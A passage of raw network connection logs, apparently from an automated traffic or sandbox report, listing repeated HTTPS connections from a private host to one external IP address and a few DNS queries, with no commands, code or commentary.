Sep 16, 2024 12:23:20.682053089 CEST | 49771 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:20.682080984 CEST | 443 | 49771 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:20.682089090 CEST | 49771 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:20.682096004 CEST | 443 | 49771 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:22.754255056 CEST | 49772 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:22.754329920 CEST | 443 | 49772 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:22.754558086 CEST | 49772 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:22.754811049 CEST | 49772 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:22.754849911 CEST | 443 | 49772 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:23.367235899 CEST | 443 | 49772 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:23.367764950 CEST | 49772 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:23.367841005 CEST | 443 | 49772 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:23.368294954 CEST | 49772 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:23.368314028 CEST | 443 | 49772 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:23.624389887 CEST | 443 | 49772 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:23.624480963 CEST | 443 | 49772 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:23.624574900 CEST | 49772 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:23.625205994 CEST | 49772 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:23.625205994 CEST | 49772 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:23.625245094 CEST | 443 | 49772 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:23.625271082 CEST | 443 | 49772 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:25.798193932 CEST | 49773 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:25.798257113 CEST | 443 | 49773 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:25.798347950 CEST | 49773 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:25.798579931 CEST | 49773 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:25.798604965 CEST | 443 | 49773 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:26.436533928 CEST | 443 | 49773 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:26.437022924 CEST | 49773 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:26.437051058 CEST | 443 | 49773 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:26.438087940 CEST | 49773 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:26.438093901 CEST | 443 | 49773 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:26.697998047 CEST | 443 | 49773 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:26.698084116 CEST | 443 | 49773 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:26.698148012 CEST | 49773 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:26.698529005 CEST | 49773 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:26.698529005 CEST | 49773 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:26.698553085 CEST | 443 | 49773 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:26.698561907 CEST | 443 | 49773 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:28.814292908 CEST | 49774 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:28.814333916 CEST | 443 | 49774 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:28.814445972 CEST | 49774 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:28.814677954 CEST | 49774 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:28.814702034 CEST | 443 | 49774 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:29.453011990 CEST | 443 | 49774 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:29.453510046 CEST | 49774 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:29.453525066 CEST | 443 | 49774 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:29.454332113 CEST | 49774 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:29.454336882 CEST | 443 | 49774 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:29.715936899 CEST | 443 | 49774 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:29.716011047 CEST | 443 | 49774 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:29.716196060 CEST | 49774 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:29.716999054 CEST | 49774 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:29.716999054 CEST | 49774 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:29.717016935 CEST | 443 | 49774 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:29.717026949 CEST | 443 | 49774 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:32.845005035 CEST | 49775 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:32.845071077 CEST | 443 | 49775 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:32.845166922 CEST | 49775 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:32.845415115 CEST | 49775 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:32.845436096 CEST | 443 | 49775 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:33.461244106 CEST | 443 | 49775 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:33.461735010 CEST | 49775 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:33.461775064 CEST | 443 | 49775 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:33.462388992 CEST | 49775 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:33.462397099 CEST | 443 | 49775 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:33.716103077 CEST | 443 | 49775 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:33.716260910 CEST | 443 | 49775 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:33.716320038 CEST | 49775 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:33.716614008 CEST | 49775 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:33.716629982 CEST | 443 | 49775 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:33.716641903 CEST | 49775 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:33.716650009 CEST | 443 | 49775 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:36.860688925 CEST | 49776 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:36.860738993 CEST | 443 | 49776 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:36.860930920 CEST | 49776 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:36.861130953 CEST | 49776 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:36.861143112 CEST | 443 | 49776 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:37.485217094 CEST | 443 | 49776 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:37.485790014 CEST | 49776 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:37.485814095 CEST | 443 | 49776 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:37.486848116 CEST | 49776 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:37.486855984 CEST | 443 | 49776 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:37.741959095 CEST | 443 | 49776 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:37.742104053 CEST | 443 | 49776 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:37.742337942 CEST | 49776 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:37.742640018 CEST | 49776 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:37.742654085 CEST | 443 | 49776 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:37.742671013 CEST | 49776 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:37.742676020 CEST | 443 | 49776 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:41.438843966 CEST | 49777 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:41.438900948 CEST | 443 | 49777 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:41.438988924 CEST | 49777 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:41.439153910 CEST | 49777 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:41.439172983 CEST | 443 | 49777 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:42.061265945 CEST | 443 | 49777 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:42.061747074 CEST | 49777 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:42.061779976 CEST | 443 | 49777 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:42.062557936 CEST | 49777 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:42.062563896 CEST | 443 | 49777 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:42.319514990 CEST | 443 | 49777 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:42.319688082 CEST | 443 | 49777 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:42.319746971 CEST | 49777 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:42.321116924 CEST | 49777 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:42.321141005 CEST | 443 | 49777 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:42.321151018 CEST | 49777 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:42.321156979 CEST | 443 | 49777 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:45.495415926 CEST | 49778 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:45.495460033 CEST | 443 | 49778 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:45.495532036 CEST | 49778 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:45.495697975 CEST | 49778 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:45.495707989 CEST | 443 | 49778 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:46.200675964 CEST | 443 | 49778 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:46.222031116 CEST | 49778 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:46.222059965 CEST | 443 | 49778 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:46.223320007 CEST | 49778 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:46.223325014 CEST | 443 | 49778 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:46.457739115 CEST | 443 | 49778 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:46.457923889 CEST | 443 | 49778 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:46.458028078 CEST | 49778 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:46.458561897 CEST | 49778 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:46.458590031 CEST | 443 | 49778 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:46.458604097 CEST | 49778 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:46.458611965 CEST | 443 | 49778 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:49.767363071 CEST | 49779 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:49.767410994 CEST | 443 | 49779 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:49.767719030 CEST | 49779 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:49.767719030 CEST | 49779 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:49.767759085 CEST | 443 | 49779 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:50.385934114 CEST | 443 | 49779 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:50.386387110 CEST | 49779 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:50.386421919 CEST | 443 | 49779 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:50.387042046 CEST | 49779 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:50.387049913 CEST | 443 | 49779 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:50.641518116 CEST | 443 | 49779 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:50.641693115 CEST | 443 | 49779 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:50.641801119 CEST | 49779 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:50.647775888 CEST | 49779 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:50.647804022 CEST | 443 | 49779 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:53.955796957 CEST | 49780 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:53.955830097 CEST | 443 | 49780 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:53.955905914 CEST | 49780 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:53.956084013 CEST | 49780 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:53.956096888 CEST | 443 | 49780 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:54.598381042 CEST | 443 | 49780 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:54.598870993 CEST | 49780 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:54.598891973 CEST | 443 | 49780 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:54.599617004 CEST | 49780 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:54.599625111 CEST | 443 | 49780 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:54.859159946 CEST | 443 | 49780 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:54.859344959 CEST | 443 | 49780 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:54.859409094 CEST | 49780 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:54.859756947 CEST | 49780 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:54.859756947 CEST | 49780 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:54.859781027 CEST | 443 | 49780 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:54.859790087 CEST | 443 | 49780 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:57.157696009 CEST | 49781 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:57.157732010 CEST | 443 | 49781 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:57.157831907 CEST | 49781 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:57.158001900 CEST | 49781 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:57.158020973 CEST | 443 | 49781 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:57.777571917 CEST | 443 | 49781 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:57.778444052 CEST | 49781 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:57.778460026 CEST | 443 | 49781 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:57.779040098 CEST | 49781 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:57.779046059 CEST | 443 | 49781 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:58.032857895 CEST | 443 | 49781 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:58.033037901 CEST | 443 | 49781 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:58.033102036 CEST | 49781 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:58.033312082 CEST | 49781 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:58.033345938 CEST | 443 | 49781 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:58.033361912 CEST | 49781 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:58.033370018 CEST | 443 | 49781 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:01.190016985 CEST | 49782 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:01.190066099 CEST | 443 | 49782 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:01.190220118 CEST | 49782 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:01.190728903 CEST | 49782 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:01.190747023 CEST | 443 | 49782 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:01.821863890 CEST | 443 | 49782 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:01.822556973 CEST | 49782 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:01.822577000 CEST | 443 | 49782 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:01.823182106 CEST | 49782 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:01.823187113 CEST | 443 | 49782 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:02.080692053 CEST | 443 | 49782 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:02.080862045 CEST | 443 | 49782 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:02.080933094 CEST | 49782 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:02.086565018 CEST | 49782 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:02.086602926 CEST | 443 | 49782 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:02.086621046 CEST | 49782 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:02.086630106 CEST | 443 | 49782 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:05.424283981 CEST | 49783 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:05.424329042 CEST | 443 | 49783 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:05.424474955 CEST | 49783 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:05.424627066 CEST | 49783 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:05.424643993 CEST | 443 | 49783 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:06.036102057 CEST | 443 | 49783 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:06.036624908 CEST | 49783 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:06.036642075 CEST | 443 | 49783 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:06.037357092 CEST | 49783 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:06.037364006 CEST | 443 | 49783 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:06.295264959 CEST | 443 | 49783 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:06.295351028 CEST | 443 | 49783 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:06.295444012 CEST | 49783 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:06.295897961 CEST | 49783 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:06.295897961 CEST | 49783 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:06.295919895 CEST | 443 | 49783 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:06.295932055 CEST | 443 | 49783 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:09.470530987 CEST | 49784 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:09.470566034 CEST | 443 | 49784 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:09.470647097 CEST | 49784 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:09.470810890 CEST | 49784 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:09.470822096 CEST | 443 | 49784 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:10.083792925 CEST | 443 | 49784 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:10.084377050 CEST | 49784 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:10.084393024 CEST | 443 | 49784 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:10.085289955 CEST | 49784 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:10.085294008 CEST | 443 | 49784 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:10.344733953 CEST | 443 | 49784 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:10.344825983 CEST | 443 | 49784 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:10.344923973 CEST | 49784 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:10.345397949 CEST | 49784 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:10.345427990 CEST | 443 | 49784 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:10.345438957 CEST | 49784 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:10.345444918 CEST | 443 | 49784 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:13.502645969 CEST | 49785 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:13.502764940 CEST | 443 | 49785 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:13.502947092 CEST | 49785 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:13.503259897 CEST | 49785 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:13.503290892 CEST | 443 | 49785 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:14.318687916 CEST | 443 | 49785 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:14.319348097 CEST | 49785 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:14.319430113 CEST | 443 | 49785 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:14.320056915 CEST | 49785 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:14.320074081 CEST | 443 | 49785 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:14.573340893 CEST | 443 | 49785 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:14.573409081 CEST | 443 | 49785 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:14.573466063 CEST | 49785 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:14.576180935 CEST | 49785 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:14.576205969 CEST | 443 | 49785 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:14.576229095 CEST | 49785 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:14.576235056 CEST | 443 | 49785 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:18.924325943 CEST | 49786 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:18.924380064 CEST | 443 | 49786 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:18.924612999 CEST | 49786 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:18.925168991 CEST | 49786 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:18.925183058 CEST | 443 | 49786 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:19.544094086 CEST | 443 | 49786 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:19.544727087 CEST | 49786 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:19.544775009 CEST | 443 | 49786 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:19.545886993 CEST | 49786 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:19.545911074 CEST | 443 | 49786 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:19.803864956 CEST | 443 | 49786 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:19.804023981 CEST | 443 | 49786 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:19.804260015 CEST | 49786 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:19.804934978 CEST | 49786 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:19.804960012 CEST | 443 | 49786 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:19.804972887 CEST | 49786 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:19.804980040 CEST | 443 | 49786 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:22.955032110 CEST | 49787 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:22.955091000 CEST | 443 | 49787 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:22.955214024 CEST | 49787 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:22.955463886 CEST | 49787 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:22.955475092 CEST | 443 | 49787 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:23.586515903 CEST | 443 | 49787 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:23.587033033 CEST | 49787 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:23.587049961 CEST | 443 | 49787 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:23.587738991 CEST | 49787 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:23.587743044 CEST | 443 | 49787 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:23.845778942 CEST | 443 | 49787 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:23.845875978 CEST | 443 | 49787 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:23.846029997 CEST | 49787 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:23.846606970 CEST | 49787 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:23.846626043 CEST | 443 | 49787 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:24:23.846652031 CEST | 49787 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:24:23.846657991 CEST | 443 | 49787 | 89.163.145.170 | 192.168.2.4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 16, 2024 12:22:23.275859118 CEST | 62065 | 53 | 192.168.2.4 | 1.1.1.1 |
Sep 16, 2024 12:22:23.283305883 CEST | 53 | 62065 | 1.1.1.1 | 192.168.2.4 |
Sep 16, 2024 12:22:27.094228983 CEST | 54109 | 53 | 192.168.2.4 | 1.1.1.1 |
